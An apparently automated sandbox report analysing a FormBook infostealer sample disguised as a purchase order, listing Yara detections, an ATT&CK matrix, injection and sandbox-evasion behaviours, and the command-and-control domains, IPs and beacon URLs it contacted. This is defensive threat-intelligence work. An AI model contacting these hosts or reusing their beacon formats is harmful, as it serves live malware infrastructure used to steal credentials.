          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 9.0.PO_101&102.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.PO_101&102.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.PO_101&102.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.PO_101&102.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.PO_101&102.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.PO_101&102.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.PO_101&102.exe.3a4c4e0.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.PO_101&102.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000009.00000002.348466397.0000000000FB0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.333516525.000000000F6F6000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.348384221.0000000000D70000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.320955277.000000000F6F6000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.542137974.0000000003070000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.539322069.00000000008D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.291465505.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.542399139.00000000030A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.294755714.00000000039A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.348134923.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.291860367.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 9.0.PO_101&102.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.PO_101&102.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.PO_101&102.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.PO_101&102.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.PO_101&102.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.PO_101&102.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.PO_101&102.exe.3a4c4e0.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.PO_101&102.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000009.00000002.348466397.0000000000FB0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.333516525.000000000F6F6000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.348384221.0000000000D70000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.320955277.000000000F6F6000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.542137974.0000000003070000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.539322069.00000000008D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.291465505.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.542399139.00000000030A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.294755714.00000000039A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.348134923.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.291860367.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection612Rootkit1Credential API Hooking1Security Software Discovery221Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsMasquerading1LSASS MemoryProcess Discovery2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerVirtualization/Sandbox Evasion41SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Virtualization/Sandbox Evasion41NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection612LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information4DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing2Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)File Deletion1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 510596 Sample: PO_101&102.exe Startdate: 28/10/2021 Architecture: WINDOWS Score: 100 31 www.99rocket.education 2->31 39 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->39 41 Found malware configuration 2->41 43 Malicious sample detected (through community Yara rule) 2->43 45 8 other signatures 2->45 11 PO_101&102.exe 3 2->11         started        signatures3 process4 file5 29 C:\Users\user\AppData\...\PO_101&102.exe.log, ASCII 11->29 dropped 57 Tries to detect virtualization through RDTSC time measurements 11->57 59 Injects a PE file into a foreign processes 11->59 15 PO_101&102.exe 11->15         started        signatures6 process7 signatures8 61 Modifies the context of a thread in another process (thread injection) 15->61 63 Maps a DLL or memory area into another process 15->63 65 Sample uses process hollowing technique 15->65 67 Queues an APC in another process (thread injection) 15->67 18 explorer.exe 15->18 injected process9 dnsIp10 33 www.champ-beauty-tomigaoka-nail.com 150.95.255.38, 49781, 80 INTERQGMOInternetIncJP Japan 18->33 35 barbershopvalleyvillage.com 52.44.94.227, 49754, 80 AMAZON-AESUS United States 18->35 37 2 other IPs or domains 18->37 47 System process connects to network (likely due to code injection or exploit) 18->47 22 wlanext.exe 18->22         started        signatures11 process12 signatures13 49 Self deletion via cmd delete 22->49 51 Modifies the context of a thread in another process (thread injection) 22->51 53 Maps a DLL or memory area into another process 22->53 55 Tries to detect virtualization through RDTSC time measurements 22->55 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          PO_101&102.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          9.0.PO_101&102.exe.400000.8.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          9.0.PO_101&102.exe.400000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          9.2.PO_101&102.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          9.0.PO_101&102.exe.400000.6.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.barbershopvalleyvillage.com/snr6/?v0DD=Zy5Qpi9o71BxgS1SycsJXGxeSETLIPANxi7ogI8FlHlRlRfybFGNqMyxmIVsIwo4eCM0&p2MTV=Jf94jZD8vHv8m0%Avira URL Cloudsafe
          http://en.w0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          www.reynbetgirisi.com/snr6/100%Avira URL Cloudmalware
          http://www.champ-beauty-tomigaoka-nail.com/snr6/?v0DD=AT56xQorg2W9iGq4d7Tt4iWj+Y9aO9Wbdx0aYCn8sjL6tNqdMMFemPCECz3N3nQc4IZ0&p2MTV=Jf94jZD8vHv8m0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://tempuri.org/DatabaseDataSet.xsd0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          barbershopvalleyvillage.com
          52.44.94.227
          truetrue
            unknown
            www.99rocket.education
            208.91.197.39
            truefalse
              unknown
              www.champ-beauty-tomigaoka-nail.com
              150.95.255.38
              truetrue
                unknown
                www.barbershopvalleyvillage.com
                unknown
                unknowntrue
                  unknown
                  www.reprv.com
                  unknown
                  unknowntrue
                    unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://www.barbershopvalleyvillage.com/snr6/?v0DD=Zy5Qpi9o71BxgS1SycsJXGxeSETLIPANxi7ogI8FlHlRlRfybFGNqMyxmIVsIwo4eCM0&p2MTV=Jf94jZD8vHv8mtrue
                    • Avira URL Cloud: safe
                    unknown
                    www.reynbetgirisi.com/snr6/true
                    • Avira URL Cloud: malware
                    low
                    http://www.champ-beauty-tomigaoka-nail.com/snr6/?v0DD=AT56xQorg2W9iGq4d7Tt4iWj+Y9aO9Wbdx0aYCn8sjL6tNqdMMFemPCECz3N3nQc4IZ0&p2MTV=Jf94jZD8vHv8mtrue
                    • Avira URL Cloud: safe
                    unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://www.apache.org/licenses/LICENSE-2.0PO_101&102.exe, 00000001.00000002.296658993.0000000006A72000.00000004.00000001.sdmpfalse
                      high
                      http://www.fontbureau.comPO_101&102.exe, 00000001.00000002.296658993.0000000006A72000.00000004.00000001.sdmpfalse
                        high
                        http://www.fontbureau.com/designersGPO_101&102.exe, 00000001.00000002.296658993.0000000006A72000.00000004.00000001.sdmpfalse
                          high
                          http://www.fontbureau.com/designers/?PO_101&102.exe, 00000001.00000002.296658993.0000000006A72000.00000004.00000001.sdmpfalse
                            high
                            http://www.founder.com.cn/cn/bThePO_101&102.exe, 00000001.00000002.296658993.0000000006A72000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.fontbureau.com/designers?PO_101&102.exe, 00000001.00000002.296658993.0000000006A72000.00000004.00000001.sdmpfalse
                              high
                              http://www.tiro.comPO_101&102.exe, 00000001.00000002.296658993.0000000006A72000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.fontbureau.com/designersPO_101&102.exe, 00000001.00000002.296658993.0000000006A72000.00000004.00000001.sdmpfalse
                                high
                                http://www.goodfont.co.krPO_101&102.exe, 00000001.00000002.296658993.0000000006A72000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://en.wPO_101&102.exe, 00000001.00000003.273913731.00000000010AD000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.carterandcone.comlPO_101&102.exe, 00000001.00000002.296658993.0000000006A72000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.sajatypeworks.comPO_101&102.exe, 00000001.00000002.296658993.0000000006A72000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.typography.netDPO_101&102.exe, 00000001.00000002.296658993.0000000006A72000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.fontbureau.com/designers/cabarga.htmlNPO_101&102.exe, 00000001.00000002.296658993.0000000006A72000.00000004.00000001.sdmpfalse
                                  high
                                  http://www.founder.com.cn/cn/cThePO_101&102.exe, 00000001.00000002.296658993.0000000006A72000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.galapagosdesign.com/staff/dennis.htmPO_101&102.exe, 00000001.00000002.296658993.0000000006A72000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://fontfabrik.comPO_101&102.exe, 00000001.00000002.296658993.0000000006A72000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.founder.com.cn/cnPO_101&102.exe, 00000001.00000002.296658993.0000000006A72000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.fontbureau.com/designers/frere-jones.htmlPO_101&102.exe, 00000001.00000002.296658993.0000000006A72000.00000004.00000001.sdmpfalse
                                    high
                                    http://www.jiyu-kobo.co.jp/PO_101&102.exe, 00000001.00000002.296658993.0000000006A72000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://tempuri.org/DatabaseDataSet.xsdPO_101&102.exefalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.galapagosdesign.com/DPleasePO_101&102.exe, 00000001.00000002.296658993.0000000006A72000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.fontbureau.com/designers8PO_101&102.exe, 00000001.00000002.296658993.0000000006A72000.00000004.00000001.sdmpfalse
                                      high
                                      http://www.fonts.comPO_101&102.exe, 00000001.00000002.296658993.0000000006A72000.00000004.00000001.sdmpfalse
                                        high
                                        http://www.sandoll.co.krPO_101&102.exe, 00000001.00000002.296658993.0000000006A72000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://dfltweb1.onamae.comwlanext.exe, 0000000D.00000002.543670677.0000000003C7F000.00000004.00020000.sdmpfalse
                                          high
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePPO_101&102.exe, 00000001.00000002.293898506.0000000002861000.00000004.00000001.sdmpfalse
                                            high
                                            http://www.urwpp.deDPleasePO_101&102.exe, 00000001.00000002.296658993.0000000006A72000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.zhongyicts.com.cnPO_101&102.exe, 00000001.00000002.296658993.0000000006A72000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.sakkal.comPO_101&102.exe, 00000001.00000002.296658993.0000000006A72000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            unknown

                                            Contacted IPs

                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs

                                            Public

                                            IPDomainCountryFlagASNASN NameMalicious
                                            52.44.94.227
                                            barbershopvalleyvillage.comUnited States
                                            14618AMAZON-AESUStrue
                                            150.95.255.38
                                            www.champ-beauty-tomigaoka-nail.comJapan7506INTERQGMOInternetIncJPtrue

                                            General Information

                                            Joe Sandbox Version:33.0.0 White Diamond
                                            Analysis ID:510596
                                            Start date:28.10.2021
                                            Start time:00:21:09
                                            Joe Sandbox Product:CloudBasic
                                            Overall analysis duration:0h 9m 45s
                                            Hypervisor based Inspection enabled:false
                                            Report type:light
                                            Sample file name:PO_101&102.exe
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                            Number of analysed new started processes analysed:25
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:1
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • HDC enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Detection:MAL
                                            Classification:mal100.troj.evad.winEXE@7/1@4/2
                                            EGA Information:Failed
                                            HDC Information:
                                            • Successful, ratio: 18.1% (good quality ratio 16.2%)
                                            • Quality average: 73%
                                            • Quality standard deviation: 31.5%
                                            HCA Information:
                                            • Successful, ratio: 96%
                                            • Number of executed functions: 0
                                            • Number of non-executed functions: 0
                                            Cookbook Comments:
                                            • Adjust boot time
                                            • Enable AMSI
                                            • Found application associated with file extension: .exe
                                            Warnings:
                                            Show All
                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                            • Excluded IPs from analysis (whitelisted): 23.211.4.86, 20.50.102.62, 20.54.110.249, 40.112.88.60, 13.107.4.50, 80.67.82.211, 80.67.82.235, 20.82.210.154
                                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, wu-shim.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, c-0001.c-msedge.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, b1ns.c-0001.c-msedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, b1ns.au-msedge.net
                                            • Not all processes where analyzed, report is missing behavior information
                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.

                                            Simulations

                                            Behavior and APIs

                                            TimeTypeDescription
                                            00:22:03API Interceptor2x Sleep call for process: PO_101&102.exe modified

                                            Joe Sandbox View / Context

                                            IPs

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            52.44.94.227Ohki Blower Skid Base Enquiry 052521.exeGet hashmaliciousBrowse
                                            • www.lawndaleballoons.com/un8c/?5j9=e1aIhBu54HwvDa9jIFoPTn+x8qwz6+WyuS6TAcXGUJ0TuA7XqmfqjA7rvtpmBfuRBanb&vR=Ltxx
                                            New Purchase Order 501,689$.exeGet hashmaliciousBrowse
                                            • www.accokeektvmounting.com/eao/?xb08qf=FCtAuHshdr0f2dc4fuyEfDsgR0BafKiFq6O5QuD89NG0N45OyG6nKW+GSjtGDGmhuPTR&1bz=xpn0PfXxSXAtfZap
                                            New Purchase Order 50,689$.exeGet hashmaliciousBrowse
                                            • www.accokeektvmounting.com/eao/?Yvux40tX=FCtAuHshdr0f2dc4fuyEfDsgR0BafKiFq6O5QuD89NG0N45OyG6nKW+GSjtsc2WhqNbR&Pp=jfLprdxxs
                                            150.95.255.38SHIPPING DOCUMENT.xlsxGet hashmaliciousBrowse
